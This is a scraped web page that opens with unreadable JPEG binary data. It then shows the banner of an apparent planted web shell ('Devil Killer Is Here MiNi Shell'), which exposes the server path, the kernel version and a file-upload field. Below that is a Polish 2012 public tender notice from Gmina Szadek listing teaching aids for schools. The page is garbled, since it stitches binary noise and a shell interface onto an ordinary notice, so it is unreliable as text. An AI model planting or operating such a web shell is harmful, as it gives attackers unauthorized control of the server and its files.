JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120404/105854-N-2012.html

<p class="kh_header"><b>Szadek: postępowania o udzielenie zamówienia publicznego 
w trybie przetargu nieograniczonego o wartości powyżej 14 000 Euro, nie przekraczającej 200 000 Euro na dostawę pomocy dydaktycznych dla szkół na terenie Gminy Szadek</b><br>
<b>Numer ogłoszenia: 105854 - 2012; data zamieszczenia: 04.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto  Szadek , ul. Warszawska 3, 98-240 Szadek, woj. łódzkie, tel. 43 8215004, faks 43 8215773.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szadek.bip.cc</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowania o udzielenie zamówienia publicznego 
w trybie przetargu nieograniczonego o wartości powyżej 14 000 Euro, nie przekraczającej 200 000 Euro na dostawę pomocy dydaktycznych dla szkół na terenie Gminy Szadek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET 1
A.Szkoła Podstawowa  w Krokocicach:
L.p.
Rodzaj pomocy dydaktycznej
Ilość sztuk
1
Wyprawka pierwszoklasisty Paleta, Zestaw Kontrolny, czyli okrągła podstawa wykonana z drewna z 12 drewnianym klockami w 6 kolorach, 2 tarcze blanko oraz 12 tematycznych tarcz WPK ze zbiorem zabaw dla dzieci od 6 lat, opartych na podstawowych założeniach programowych nauczania zintegrowanego: dodawanie i odejmowanie w zakresie 20, łączenie w pary obrazków logicznie do siebie pasujących, rozpoznawanie i utrwalanie nazw zwierząt, owoców i warzyw,
 rozpoznawanie liter alfabetu - pierwsze litery nazw obrazków, łączenie sylab w proste wyrazy, łączenie wyrazów jednosylabowych z obrazkami. Rozwija u dziecka spostrzegawczość i koncentrację,
uczy myślenia i zapamiętywania oraz kształtuje osobowość i charakter. 

5
2
Pomoc logopedyczna-zestaw: poradnik, który szczegółowo wyjaśnia sposoby posługiwania się materiałami, materiał obrazkowy , gry językowe i kombinacje ćwiczeń językowych, etykiety z podpisami do obrazków; 398 kart, format A4

1
3
Gra ćwicząca pamięć, spostrzegawczość i refleks, średnica planszy min. 64 cm, w kształcie koła, na którym zostało umieszczone 300 różnych obrazków. Gracz odszukuje na dużej planszy identycznego obrazka. Kartoniki 3x3cm-300szt., 18 żetonów 

1
4
Zestaw na układanie działań dla malców ze słabo ukształtowaną umiejętnością pisania-zestaw:54 filcowe kwadraty z grafiką cyfr 0-9 oraz ze znakami matematycznymi min.wym.tafelka16,5x16,5 cm 

1
5
Program multimedialny, rozwijający logiczne myślenie, spostrzegawczość, dodawanie, odejmowanie w zakresie1-30, porównywanie liczb, określanie liczebności zbiorów, mnożenie liczb jedno i dwucyfrowe, ciągi malejące i rosnące 

5
6
Program multimedialny, kształtuje myślenie operacyjne, pamięć, sprawność manualną, dodawanie, odejmowanie w zakresie 1-1000, mnożenie i dzielenie 1-100, zadania z jedną niewiadomą, porównywanie liczb i dni tygodnia 

5
7
Program multimedialny, kształtuje myślenie operacyjne, pamięć, sprawność manualną, uzupełnienie ciągu liczb 1-100, dodawanie i odejmowanie, mnożenie, dzielenie 1-100, odczytywanie zegara, obliczenia czasu, cen, długości, wysokości przedmiotów

5
8
Program multimedialny, gra edukacyjna 6-7 lat, dodawanie w zakresie 1-20, uzupełnianie porządku liczb 1-100, działania arytmetyczne, znajdowanie szczegółowych elementów na większej ilustracji, grupowanie elementów według wybranej kategorii, dodawanie liczb naturalnych z wykorzystaniem walut 

5
9
Program multimedialny, interaktywna gra edukacyjna dla dzieci w wieku 6-10 lat, kształtująca umiejętność czytania i pisania, wprowadzająca dziecko w świat liter, wyrazów, zdań oraz tekstów, różnorodne ćwiczenia interaktywne, gry językowe, wierszyki, animacje, kolorowe ilustracje 

5
10
Mata z zegarem-mata z dwoma ruchomymi wskazówkami, godzinową i minutową, mata winylowa o boku min. 137cm, 2 nadmuchiwane kostki o boku min.12 cm 

1
11
Ruchomy kalendarz-tablica magnetyczna min. 70x50cm, magnesy, kompatybilne elementy pogodowe 19, rodzaje zajęć/aktywności 18,  kolejne dni miesiąca 31, liczby do układania bieżącego roku 10, fazy księżyca 8, strzałki do oznaczania 2, ramki do oznaczania dni świątecznych w kalendarzu 2 

1
12
Mata matematyczna-gra ruchowa w formie maty podłogowej do nauki dodawania i odejmowania w zakresie 12, na dole mapy oś liczbowa, mata winylowa o wym. minimum 122x152cm, 2 kostki piankowe z liczbami min.dł.boku 12,7cm, 1 kostka piankowa ze znakami +,-, dł.boku min.12,7cm, 28 kartonowych żetonów

1
13
Gra, której celem jest zebranie jak największej ilości cukierków w wyznaczonym czasie, od 4 lat, gra rozwija spostrzegawczość i ćwiczy refleks-plansza z tkaniny, 3 kostki z kolorami, 41 kolorowych drewnianych cukierków o wym. min. 13cm 

1
14
Piaskownica drewniana o podłożu akrylowym, 1 kg. piasku, grabie, grabki i listwa wyrównująca, min. wym. piaskownicy 65 x 60 x 4 cm 

2
15
Akcesoria do piaskownicy. Służą do zabawy z piaskiem - kreślenia, wałkowania,
przesuwania, zestaw: 4 podstawki pod piaskownicę, wys. 10 cm, wycieraczka z rączką, szer. 21 cm,
 piłeczka jeżyk, śr. 6 cm, plastikowa rurka, dł. 21 cm z otworem na piasek, 2 drewniane biedronki z magnesem prowadzone za pomocą rączki o dł 7 cm 

2
16
Kratki do mozaiki-min.wym.18x24cm, 5 sztuk, białe plastikowe kratki służące do wpinania plastikowych gwoździków

5
17
Gwoździki plastikowe do kratki mozaikowej- 600 sztuk, średnica 1,3cm, wysokość 2,8cm 

5
18
Karty do pisania- 12 kart o min. wym. 24,5x22cm z tworzywa sztucznego ze śladem kropkowym, z 4 ołówkami w drewnianym pudełku z otwieraną pokrywą, ćwiczenia rozwijają motorykę ręki, właściwe trzymanie ołówka i przygotowują do pisania 

1
19
Klocki do zabawy i nauki wymowy, czytania, pisania, ortografii i matematyki. W kasecie znajduje się 150 klocków z umieszczonym na nich pełnym zestawem 44 liter, cyfr, znaków
interpunkcyjnych i matematycznych. Każdy klocek to 4 podstawowe warianty zapisu litery: wielka i mała drukowana oraz wielka i mała wpisana w liniaturę. Zielony szlaczek u dołu każdego z czterech wariantów liter umożliwia właściwe umieszczanie oraz postrzeganie liter, min. wym. 1,5 x 4 x 1,5 cm

2
20
Liczydło stojące z tablicą magnetyczną w drewnianej ramie min. wym.110x134cm, 10 rzędów korali po 5 w każdym kolorze

2
21
Pomoc dydaktyczna typu: słowa i zdania - zestaw 22 kart A4 i wzorów do budowy zdań o różnej długości. Karty mają na celu
wzbogacanie słownictwa dziecka. Każda karta podzielona jest na dwie części: pierwsza to rysunki przykładowych desygnatów należących do danej kategorii nadrzędnej, druga to miejsce, w którym dzieci samodzielnie mogą dorysować lub wkleić inne rysunki przedstawiające przedmioty z omawianej kategorii. Dołączone wzory do budowania zdań służą dziecku jako pomoc w tworzeniu zdania o różnej długości z wybranym wyrazem z danej kategorii. instrukcja z propozycjami zabaw. Rozwijają rozumienie mowy, analizę słuchową na poziomie zadania - określanie liczby wyrazów w zdaniu, pozwalają na porównywanie długości zdań, stymulują logiczne myślenie, wzbogacają słownictwo i uczą kreatywności.

2
22
Duży, ruchomy alfabet . Drewniane pudełko pełne liter. Pozwala wypełnić dziecięcy czas ćwiczeniami z zakresu analizy i syntezy literowo-głoskowej. Pokrywka z liniaturą zapoznaje ze sposobami umieszczania znaków w zeszycie. Podział kolorystyczny wprowadza i utrwala tradycyjne rozróżnienie głosek. Całość mieści się w drewnianym pudełku z przegródkami, w których jest 18 samogłosek i 12 spółgłosek
Wym. min. pudełka.: 39 x 63 cm.

5
23
Abecadło, 26 liter -Drewniane puzzle. Kształty cięć różne dla każdego elementu pozwala na ustawianie cegiełek z symbolami tylko w jednej możliwej kolejności. Żywe kolory i zabawne obrazki. Wym.min.: 6,5 x 135 cm. 

5
24
Pomoc typu: magiczna walizka. Ogromny pojemnik pełen kolorowych znaków: cyfr, symboli matematycznych, liter oraz kart językowych. Posiada nakrywkę-tablicę o właściwościach magnetycznych, z kratkowaną powierzchnią do pisania oraz możliwością ustawiania w pionie i mocowania w podstawie. Do zestawu dołączono specjalny pisak i gumkę. Wym.min.: 40 x 32 x 7 cm. 

5
25
Pomoc dydaktyczna typu: warsztat graficzny- Karty z wzorami o różnej skali trudności, ćwiczące umiejętność prowadzenia linii po wyznaczonym torze. 4 teczki z tworzywa o min. wym. 21 x 30 cm; 30 kart ze wzorami; 10 zmywalnych mazaków; od 4 lat 

1
26
Pomoc dydaktyczna typu: warsztat graficzny- Karty z bardziej skomplikowanymi wzorami, wymagającymi
większej precyzji przy ich odtwarzaniu. Ruchy dziecka stają się płynniejsze i bardziej dokładne.
 4 teczki z tworzywa o min. wym. 21 x 30 cm; 30 kart ze wzorami; 10 zmywalnych mazaków; od 5 lat

1
27
Pomoc dydaktyczna typu :dywaniki glottodydaktyczne. Korzystanie z dywanika doskonali koordynację wzrokowo-ruchową oraz analizę fonemową. Na całość składają się dwa dywaniki: jeden z literkami podstawowymi, a drugi z literkami niepodstawowymi z zaznaczonym na nich kierunkiem kreślenia.
Wykonany z tworzywa. 2 szt.; min. wym. 89,5 x 89,5 cm 

5
28
Kolorowa makatka z 6 typów różnych zapięć guziki, napy, rzepy, klamerki,
suwak, sznurowadło. Z makatką można doskonalić umiejętności językowe i matematyczne. Forma drzewa z kolorowymi, ruchomymi elementami i ukrytym w jego wnętrzu wesołym mieszkańcem. Ruchome listki, jabłuszka, motylki i kwiatki - min. wym. 75 x 70 cm, 6 typów zapięć, 18 elementów ruchomych 

1
29
Pomoc typu: szlaczki graficzne - zestaw czerwony. Linia 1-0,3 cm. Zestaw dostosowany dla dzieci od 6lat. W zestawie występują: podwójny szlaczek do kreślenia łamanych ciągłych z 1 cm odstępem, dwa razy podwójny szlaczek do kreślenia literopodobnych wzorów po śladzie kropkowym.

3
30
Pomoc typu: magnetyczne szlaczki - zestaw zielony, pomoc doskonaląca umiejętności grafomotoryczne. Wodzenie metalowej kuleczki po śladzie przy pomocy magnetycznego pisaka wym. min. 35x15 cm 

2
31
Pomoc typu: magnetyczne szlaczki -zestaw niebieski, pomoc doskonaląca umiejętności grafomotoryczne, rozwija koordynację wzrokowo-ruchową, ćwiczy prawidłowe kreślenie wzorów i trzymanie prawidłowe narzędzia do pisania. Wodzenie metalowej kuleczki po śladzie przy pomocy magnetycznego pisaka min. wym. 35x15 cm 

2
32
Zestaw logicznych sześcianów- sześciennych kostek w 4 kolorach czerwonym, zielonym, żółtym i niebieskim do obserwacji i odwzorowywania. Komplet umieszczony w drewnianym pudełku. 10 kart ze wzorami o min. wym. 25 x 14 cm; 4 podstawki o dł. min.  25cm; 80 klocków o min. wym. 2,8x2,8cm; min. wym.
pudełka 33x36x8cm. 

2
33
Komplet plansz w 3 linie. Komplet 10 plansz w 3 linie tło czarne, linie białe, do ćwiczeń grafomotorycznych z wykorzystaniem białego pisaka. Pomoc do wielokrotnego
wykorzystania.  wym. min.  20,5 x 24,5 cm

3
34
Białe ołówki -zestaw- 12 szt. do rysowania na tabliczkach ze szlaczkami
Rozmiar: wkład O3mm, min. dł.17,5cm 

3
35
Plansze do zabawy z  liczbami - magnetyczne plansze, pomoc edukacyjna, do nauki liczenia w zakresie od 1 do 10. Ćwiczy i rozwija u dzieci logiczne myślenie. Zestaw zawiera:  12 szt. o min. wym. 25 x 5 cm magnetycznych kart  60 szt. o min. wym. 4,8 x 4,8 cm magnetycznych żetonów  instrukcję.

1
36
Pudełka z liczbami- pomoc, obrazuje liczby, ułatwia ich postrzeganie, zapamiętywanie i zrozumienie ich konstrukcji. Karty zawierają ćwiczenia o różnym poziomie trudności :  seria różowa: kojarzenie liczb do 10  seria niebieska: dopełnianie do 10  seria czerwona: odejmowanie  seria pomarańczowa: kojarzenie liczb powyżej 10  seria zielona: dodawanie liczb dwa pudełka. Pudełka z 10 przegródkami reprezentują liczbę 10 i mogą się ze sobą łączyć.  48 kart instrukcji o min. wym 23 x 13,7 cm  5 kart z odpowiedziami  6 pudełek z tworzywa o min.wym. 23 x 11,7 cm  60 czerwonych
żetonów  60 niebieskich żetonów.

2
37
Logiczne układanki -gra logiczna dla jednego gracza. Gra rozwija: - koordynację wzrokowo - ruchową - orientację w przestrzeni - różnicowania i nazywania emocji - zdolności analityczne - logiczne myślenie W grze zawarte są 4 platformy o różnym stopniu trudności. Zadaniem dzieci jest dopasować drewniane karty do odpowiedniego miejsca na platformie.
 1 platforma to osoby i emocje, 2 platforma to owoce i miejsce ich położenia, 3 platforma to obiekty i kierunki położenia, 4 platforma to dobieranie w pary figur geometrycznych  4 drewniane, ilustrowane platformy  64 drewniane karty. Całość w drewnianym pudełku.

5
38
Nakładki korygujące dopasowane do wielkości dziecięcych dłoni-korygują nieprawidłowy uchwyt poprzez właściwe ustawienie kciuka i palca wskazującego. Kontrolują siłę nacisku. Zawartość: 10 sztuk w różnych kolorach. Wymiary: 2,5x2,5 cm. Materiał: tworzywo sztuczne 

1
39
Tabliczki do nauki pisania - w zestawie tabliczki o różnym stopniu trudności. Zawartość: 10 tabliczek, drewniany ołówek. Wym. Min.: 24x17 cm. W drewnianym pudełku min. 21x30x7 cm

3
40
Makatka edukacyjna - kalendarz.. Wym. min.: 150x90 cm. Na dużym formacie, w bardzo czytelny sposób, rozmieszczone są kieszonki, w których umieszcza się kartoniki z zapisem bieżącego roku, nazwami miesięcy oraz dni tygodnia. Funkcję dydaktyczną kalendarza podnoszą dodatkowo miękkie plansze do oznaczania aktualnego stanu pogody 6 sztuk oraz kolorowe oznaczenia kolejnych pór roku z typowymi dla nich atrybutami. Strzałki wskazujące aktualny miesiąc i dzień tygodnia umieszczone są na dużych guzikach, co stwarza doskonałą okazję do dodatkowych ćwiczeń manipulacyjnych. Kartoniki z odpowiednimi nazwami można wydrukować lub wykonać wspólnie z całą grupą.

1
41
Torba z instrumentami-torba z licznymi kieszeniami, z trwałej tkaniny, zamykana na zamek. Zawartość: tamburyn, tamburyn z membraną, 5 trójkątów 10-20 cm, 2 drewniane marakasy, duże guiro z tarką, 2 tonbloki 2 tony, tonblok 1 ton, pudełko akustyczne, 2 kastaniety, kastaniety z rączką, para klawesów, shaker metalowy. Wym. Torby po zamknięciu min. 40x40 cm 

8
42
Gotowy zestaw do rytmiki-zawartość: piłki do rytmiki 4 szt., chusty cyrkowe matowe 3 szt., chusty cyrkowe neonowe 3 szt., kolorowe liny 5 szt., muzykalne jajka 4 szt., wstęgi gimnastyczne 6 szt., tamburyn 21 cm, trójkąty 2 szt., dzwonki na drewnianej rączce 3 szt., klawesyn 2 pary, bębenek ręczny 25 cm 

8
43
Ksylofon kolorowy-15 dźwięków, sopran, c4-c6, rozmiar: dł. 47 x szer. 15 24,5 x wys. 4,4 cm 

8
44
Bębenek z 8 parami dzwonków, z naciągiem z tworzywa sztucznego i kluczem do naciągania; średnica 25 cm 

8
45
Bęben conga-materiał: drewno, metal, naciąg ze skóry naturalnej, z paskiem do zawieszenia i kluczem do strojenia. Rozmiar: średnica 20 cm, wys. 30 cm 

4
46
Dzwonki diatoniczne z watowaną torbą nylonową, z zaokrąglonymi krawędziami, z 2 pałeczkami, 6-tonowe:c, d, e, g, a, c. Materiał: rama i pałeczki z drewna bukowego i sosnowego, płytki dźwiękowe z obrabianej powierzchniowo taśmy do dzwonków. Rozmiar: dł. 17 cm, c-płytki dźwiękowe 9 cm dł., c- płytki dźwiękowe 6 cm 

8
47
Statyw do nut - rozkładany, stabilny z perforowaną półką stalową 48x35 cm, może być używany zarówno w pozycji stojącej jak i siedzącej. Wysokość 70 do 120 cm. Materiał: metal. Kolor: czarny. Waga: ok. 3,8 kg 

4
48
Para talerzy-wym. 15x15x1,8 cm 

4
49
Cztery flety proste sopranowe-renesansowe, drewniane, lakierowane zestaw

1
50
Flet prosty altowy w stroju F 

4
51
Kolorowe dzwonki z rączką-w zestawie 8 szt., każdy kolor oznacza inny dźwięk 

4
52
Grające tuby-lekkie i kolorowe tuby wykonane z plastiku do nauki rytmu i wygrywania melodii, w zestawie 8 szt., dł. do 63 cm 

4
53
Bongos dla dzieci-naciągnięte prawdziwą skórą, z kolorowymi lakierowanymi proszkowo pierścieniami zaciskowymi wraz z kluczem dociskającym do uchwytu. Wymiary: średnica 19 i 21 cm, wysokość 19 cm. Z kluczem do strojenia 

4
54
Pląsy z długą brodą-książka Marii Tomaszewskiej 92 strony 

1
55
Pląsy z długą brodą-4 płyty CD. Zestaw składa się z 82 utworów w dwóch wersjach: wokalno - instrumentalnej w wykonaniu dzieci i instrumentalnej 

2
56
Tamburyny drewniane różnej wielkości-zestaw zawiera 4 tamburyny różnej wielkości wykonane z drewna średnica 16, 18, 20, 22 cm, wys. każdy 5,5 cm. Wszystkie z dziurką na uchwyt i filcowymi podkładkami na dolnej krawędzi, z 1 pałeczką filcową 

4
57
Chusta animacyjna-kolorowa, posiadająca 8 uchwytów plus książka zabawy z chustą klauza w zestawie

1
58
Tablica interaktywna- Minimalne parametry: przekątna tablicy 65 przekątna powierzchni roboczej 56, technologia IR, obsługa palcem, powierzchnia suchościeralna i magnetyczna, obsługa za pomocą palca lub dowolnego wskaźnika, obszar roboczy odporny na uszkodzenia mechaniczne; min. powierzchnia robocza:1159 mm x 831 mm, oprogramowanie podstawowe
1

B.Zespół Publicznego Gimnazjum i Szkoły Podstawowej w Szadku
L.p.
Przedmiot zamowienia 
Szczegółowy opis
Ilość sztuk
1
Eduterapeutica.Dyslekcja -mulitimedialny program do diagnozy i terapii dyslekcji na 10 stanowisk.
Zestaw zawiera Aplikacje Terapeuty, Moduł ogólnej diagnozy pedagogicznej, program zawiera minimum 330 ćwiczeń i minimum 137 kart pracy do wydruku
1
2
Eduterapeutica.Dyskalkulia-mulimedialny program na 10 stanowisk
Multimedialny program, zawierający aplikację Terapeuty, Moduł ogólnej diagnozy pedagogicznej, zestaw do terapii dyskalkulii, około minimum 120 ćwiczeń w formie gier wielopoziomowych
1
3
Matematyka na wesoło.Pierwwsze odkrycia 5-6 lat
Multimedialna gra edukacyjna dla dzieci zawierająca serię ćwiczeń rozwijających kompetencje matematyczne uczniów w wieku wczesnoszkolnym
1
1
1
4
Matematyka na wesoło.Pierwsze odkrycia 6-7 lat
1
2
5
Matematyka na wesoło.Pierwsze odkrycia7-8 lat
6
Matematyka na wesoło.Pierwsze odkrycia 8-9 lat
7
Glottodywanik-tabliczka mnożenia na dywaniku
8
Czytam i pisze 6-10lat.EduSensus-interaktytwna nauka języka polskiego
Gra edukacyjna- interaktywna nauka języka polskiego
10
9
Wesołe abecadło
Zestaw edukacyjny dla dzieci do nauczania zasad ortografii. W jego skład wchodzą;minimum 70 kwadratowych dwustronnych kart o wymiarach minimum 4,5 4,5 i 70 prostokątnych kart o wymiarach minimum 7.5 2cm +minimum 4 notesiki
2
10
Krzyżówkowy zawrót głowy
Gra edukacyjna w formie puzzli, na których umieszczone są litery polskiego alfabetu. W zestawie minimum 70 puzzli oraz opis minimum 4 gier.
2
11
Literki małe i duże
Pouczające memo-literowe, zawierające małe, wielkie, pisane oraz drukowane znaki. Zestaw zawiera minimum 48 kwadratowych kart o wymiarach minimum 7,5 7,7
2
12
Sylaby do zabawy
Gra logopedyczna zawierająca minimum 55 kart żabek, minimum 55 kart ilustracji, planszę minimum 5 pionków, kostkę, instrukcję. Wymiary pudełka minimum 19 18 5cm
1
13
Środowisko naturalne i zwierzęta 
Zestaw kart wraz z płytą. Wymiary kart minimum  13.5cm 19.5cm minimum 25 kart, żetony
1
14
Instrumenty muzyczne
Zestaw kart wraz z płytą. Wymiary kart minimum 13.5cm 19.5cm minimum 25 kart, żetony
1
15
Lotto dźwiękowe zwierzęta
Nagrania niezwykłych odgłosów przyrody. Zestaw; płyta CD, minimum 6 różnych kart ze sztywnego kartonu(minimum 25cm 19cm oraz  minimum 40 plastikowych żetonów o średnicy minimum 3,5cm
1
17
Interaktywny organizm człowieka-model przestrzenny
Wymiary modelu minimum 26 38 18. Dzieci naciskając interaktywne przyciski na modelu mogą wysłuchać informacji o narządach człowieka ,ich lokalizacji i funkcjach.
2
18
Układ słoneczny-model przestrzenny
Wymiary 48 34 10. Dzieci naciskając interaktywne przyciski na modelu zdobywają wiedzę o planetach, odległościach między nimi i panujących na nich warunkach
2
19
Mikroskop uniwersalny
Wysokość minimum 24cm, wymiary podstawy minimum 6,5 11,5 cm podświetlany pulpit, mikroskop daje możliwość powiększenia nawet razy 300.
8
20
Preparaty do mikroskopu-Botanika
Preparaty do mikroskopu-tkanki roślinne i zwierzece 
8
21
Podstawa tysięczna magnetyczna
Tablica do zrolowania opatrzona w kolorowe pola tysięczne i nadrukowane skale. Zestaw zawiera:  minimum 1 tablicę o wymiarach minimum 200 38,5cm, minimum 2 płytki do przykrywania o wymiarach minimum 16 19,5cm,minimum  10 kart liczbowych, minimum 30 magnesów, śr.minimum  15mm.
4
22
Liczydło jednospadowe do 20
Długość minimum 23cm, niebiesko- czerwone kuleczki o śr. minimum 11mm, drewniana podstawa.
16
23
Liczydło liniowe-pzrestrzeń liczbowa 100
Zawieszane za pomocą minimum 2 haczyków, składające się z czerwono-białych soczewek.
2
24
Kolorowa podstwawa dziesiętna-oklejona magnetycznym tworzywem
Zestaw zawiera trójwymiarowe klocki w minimum 4 różnych kolorach, w specjalnych pudełku w przegródkami. Zawartość minimum ;25jednośći,12dziesiatek,12 setek, 5 tysięcy.
4
25
Duży zegar demonstracyjny
Przeznaczony do tablic ściennych, wys minimum 41cm, na tylnej stronie magnesy.
8
26
Mini zegarki dla uczniów
Małe zegarki ze statywami do oparcia
16
27
7-menzurek-miara litrowa
W zestawie: cylindry z wypukłą skala milimetrową. Menzurki obejmują 10,25,50,100,250,500,1000ml
8
28
Duża tablica do 100 na podłogę
Zawartość: 1 tablica do 100 z winylu wym minimum 120 120, 2 dmuchane kostki minimum 12 12cm ,minimum 54 ramki do zaznaczania z twardego kartonu.
1
29
Magnetyczna taśma liczbowa 0-20
Zawartość: 1 magnetyczna taśma liczbowa od zera do -20 z folii stalowej, 22 magnetyczne liczmany, dwustronne, czerono-niebieskie, o śr minimum 5cm, 22 magnetyczne pierścienie o śr. minimum .5,5cm, 10 magnetycznych liczmanów z motywami, 4 magnetyczne paski dwustronne, 2 karty do kopiowania DIN4
1
30
Tacka ze 100 liczmanami 
Biała plastikowa tacka z czerwono-niebieskimi liczmanami o śr minimum  5 cm razem ze znakami arytmetycznymi
8
31
Multi-Split-ćwiczenia matematyczne
Wymiary:minimum 73 47 13cm. Zestaw składa się zminimum  2 rozdzielanych pudełek, minimum 1 zbiornika,minimum 1 przesuwanej tulejki i minimum 10 pomarańczowych kulek
16
32
Drzewko liczbowe
Drzewko liczbowe o wysokości 12 cm + 10 kuleczek z tworzywa sztucznego.
16
33
Magiczny cylinder
Cylinder z tworzywa sztucznego- wys. minimum 24 cm
4
34
Zestaw kart do magicznego cylindra
Minimum 13 różnych zestawów oraz minimum 1 pusty zestaw kart. Każde pudełko zawiera minimum  52 karty
13
35
Trener Heineveetter z automatyczną kontrolą wyników: trener 10
